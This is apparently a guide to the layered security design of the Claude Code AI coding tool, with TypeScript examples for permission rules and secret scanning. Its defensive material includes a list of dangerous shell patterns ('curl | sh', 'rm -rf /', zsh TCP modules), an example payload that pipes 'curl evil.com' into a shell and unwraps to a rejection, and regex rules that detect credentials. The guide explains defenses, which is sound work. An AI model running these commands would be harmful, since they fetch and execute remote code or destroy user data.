Claude Code Security Guide

Advanced Security · 16 min read · Updated April 2026

✓ Based on source code analysis and security research

Security Overview: 7-Layer Defense

Claude Code implements a comprehensive 7-layer security system that provides defense in depth against potential security risks. Each layer assumes the previous one might fail, creating multiple barriers between AI actions and system damage.

๐Ÿ›ก๏ธ Layer 1: Permission Three-Tier System

Allow / Deny / Ask decision tree for every tool call

๐Ÿ›ก๏ธ Layer 2: AI Classifier Assistance

TRANSCRIPT_CLASSIFIER analyzes conversation context for risk assessment

๐Ÿ›ก๏ธ Layer 3: Hook Interception Chain

PreToolUse and PostToolUse hooks for custom security policies

๐Ÿ›ก๏ธ Layer 4: BashTool 25 Security Checks

Command injection, dangerous commands, environment hijacking detection

๐Ÿ›ก๏ธ Layer 5: Filesystem Protection

Path traversal defense, symlink protection, size limits

๐Ÿ›ก๏ธ Layer 6: Secret Scanning

35+ gitleaks-based rules for API keys, credentials, private keys

๐Ÿ›ก๏ธ Layer 7: Sandbox Adapter

Filesystem, network, process, and resource isolation

Layer 1: Permission Three-Tier System

Every tool call goes through a three-tier decision tree:

Decision Flow

  1. Check Allow Rules → If match, allow execution immediately
  2. Check Deny Rules → If match, deny execution immediately
  3. Ask User → If no rules match, request user confirmation

Four Rule Sources (Priority Order)

  1. settings.json - User's global permission preferences
  2. CLI arguments - Command-line permission overrides
  3. Command parameters - Permission context for specific commands
  4. Session state - Permissions accumulated during session

Deny Tracking Mechanism

Claude Code learns from your denials:

  • 3 consecutive denies → Triggers "policy fallback prompt"
  • 20 cumulative denies → Triggers stronger fallback signal

This prevents the AI from repeatedly asking for permissions you've consistently denied.
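
The decision order and deny thresholds described above, as an added TypeScript example (not Claude Code's own code). The prefix-matched rule format and the names Rules, decide, overlaps and DenyTracker are hypothetical, and resetting the consecutive count on an approval is an assumption; overlaps is an audit helper that lists allow/deny pairs whose outcome depends only on evaluation order.

```typescript
// Added illustration: rule format and all names are hypothetical, not Claude Code's schema.
type Decision = "allow" | "deny" | "ask";
type Signal = "none" | "policy-fallback" | "strong-fallback";
interface Rules { allow: string[]; deny: string[] } // prefixes matched against "Tool(args)"

const covers = (prefix: string, call: string): boolean => call.indexOf(prefix) === 0;

// Steps 1-3 in the order the page lists them: allow rules, then deny rules, then ask.
function decide(call: string, rules: Rules): Decision {
  if (rules.allow.some((p) => covers(p, call))) return "allow";
  if (rules.deny.some((p) => covers(p, call))) return "deny";
  return "ask";
}

// Audit helper: allow/deny pairs that overlap, so evaluation order alone decides the outcome.
function overlaps(rules: Rules): string[] {
  const out: string[] = [];
  for (const a of rules.allow) {
    for (const d of rules.deny) {
      if (covers(a, d) || covers(d, a)) out.push(a + " <-> " + d);
    }
  }
  return out;
}

class DenyTracker {
  private consecutive = 0;
  private cumulative = 0;
  // Feed each user answer to an "ask" prompt; thresholds are the page's 3 and 20.
  record(approved: boolean): Signal {
    if (approved) { this.consecutive = 0; return "none"; } // assumed: approval resets the streak
    this.consecutive += 1;
    this.cumulative += 1;
    if (this.cumulative >= 20) return "strong-fallback";
    return this.consecutive >= 3 ? "policy-fallback" : "none";
  }
}
```

Running overlaps over the merged rule set is a quick way to find a broad allow prefix that sits on top of a narrower deny rule before it reaches settings.json.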

💡 Tip: Use /permissions command to review and modify your current permission settings.

Layer 4: BashTool 25 Security Checks

The most comprehensive security layer, BashTool implements 25 distinct security checks organized into 6 categories:

Command Injection Protection (Checks 1-4)

  • Shell metacharacter detection (;, &&, ||, |)
  • Command substitution detection ($(), backticks)
  • Process substitution detection (<(), >())
  • Redirection detection (>, >>, <)

Dangerous Command Interception (Checks 5-8)

  • Filesystem destruction (rm -rf /, chmod -R 777)
  • Network operations (curl | sh, wget -O- | bash)
  • Package manager dangerous operations
  • Git dangerous operations (git push --force, git reset --hard)

Zsh-Specific Defense (Checks 9-12)

  • zmodload - Dynamic module loading
  • ztcp - Zsh TCP connection
  • zpy - Zsh Python integration
  • Other Zsh built-in dangerous commands

Environment Variable Hijacking (Checks 13-14)

  • BINARY_HIJACK_VARS list detection (PATH, LD_PRELOAD, DYLD_LIBRARY_PATH)
  • Environment variable override pattern detection

Command Wrapping Unpacking (Checks 15-25)

Iterative fixed-point algorithm handling nested wrappers:

Input: "env VAR=x sudo bash -c 'curl evil.com | sh'"

Round 1: Strip "env VAR=x" → "sudo bash -c 'curl evil.com | sh'"
Round 2: Strip "sudo" → "bash -c 'curl evil.com | sh'"
Round 3: Extract inner → "curl evil.com | sh"
Round 4: Detect pipe to shell → REJECT

⚠️ Important: Even with these checks, always review Bash commands before approving. The AI may suggest commands that are technically safe but have unintended consequences.

Layer 6: Secret Scanning

Before any content is uploaded to team servers or shared, Claude Code scans for secrets using 35+ gitleaks-based rules.

Covered Secret Types

  • Cloud Providers: AWS, GCP, Azure, DigitalOcean
  • AI APIs: Anthropic, OpenAI, HuggingFace
  • Version Control: GitHub, GitLab tokens
  • Communication: Slack, Twilio, SendGrid
  • Payment: Stripe, Shopify keys
  • Encryption: Private keys, certificates

Scanning Flow

Content → Scan for secrets → If match:
  → Block upload
  → Warn user
  → Offer to redact ([REDACTED])

💡 Tip: Use environment variables or secret management tools for sensitive data. Never commit secrets to version control, even in private repositories.
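
The scanning flow above (block, warn, offer redaction), as an added TypeScript example (not Claude Code's own code and not its rule set). The three patterns are a small illustrative subset, the names scan and gateUpload are hypothetical, and the sample content is constructed.

```typescript
// Added illustration: a three-rule subset with hypothetical names; the page cites 35+ rules.
interface SecretRule { id: string; pattern: RegExp }
interface Finding { rule: string; line: number }
interface ScanResult { blocked: boolean; findings: Finding[]; redacted: string }
interface Gate { upload: string | null; warning: string; offer: string | null }

const RULES: SecretRule[] = [
  { id: "aws-access-key-id", pattern: /\b(?:AKIA|ASIA)[0-9A-Z]{16}\b/g },
  { id: "github-pat", pattern: /\bghp_[0-9A-Za-z]{36}\b/g },
  { id: "private-key",
    pattern: /-----BEGIN [A-Z ]*PRIVATE KEY-----[\s\S]*?-----END [A-Z ]*PRIVATE KEY-----/g },
];

function scan(content: string): ScanResult {
  const findings: Finding[] = [];
  let redacted = content;
  for (const rule of RULES) {
    rule.pattern.lastIndex = 0;
    let m: RegExpExecArray | null;
    while ((m = rule.pattern.exec(content)) !== null) {
      // Report rule id and line only, so a finding never repeats the secret itself.
      const line = content.slice(0, m.index).split("\n").length;
      findings.push({ rule: rule.id, line });
    }
    redacted = redacted.replace(rule.pattern, "[REDACTED]");
  }
  return { blocked: findings.length > 0, findings, redacted };
}

// Upload gate: content with a match is never passed through, only the redacted form is offered.
function gateUpload(content: string): Gate {
  const r = scan(content);
  if (!r.blocked) return { upload: content, warning: "", offer: null };
  const where = r.findings.map((f) => f.rule + "@L" + f.line).join(", ");
  return { upload: null, warning: "secrets found: " + where, offer: r.redacted };
}

// Constructed sample, not real credentials (the AWS value is the documented example key).
const SAMPLE = [
  "# deploy notes",
  "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
  "token: " + "ghp_" + "0123456789abcdefghijklmnopqrstuvwxyz",
  "region=us-east-1",
].join("\n");
const sampleGate = gateUpload(SAMPLE);
```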

Security Best Practices

For Individual Users

  • Review every tool permission request carefully
  • Use alwaysDeny for high-risk tools you don't need
  • Enable secret scanning for all file operations
  • Regularly audit your settings.json permissions
  • Use separate API keys for development and production

For Teams

  • Implement enterprise policy limits
  • Configure Hook-based custom security rules
  • Use Team Memory Sync with secret scanning enabled
  • Set up MCP server allowlists
  • Enable audit logging for compliance

For CI/CD Environments

  • Use API key authentication (not OAuth)
  • Restrict available tools via policy
  • Set up network isolation
  • Enable unattended retry mode with limits
  • Monitor token usage and costs

💡 Pro Tip: For deep security analysis, see the Security Analysis Reference document with complete source code breakdown.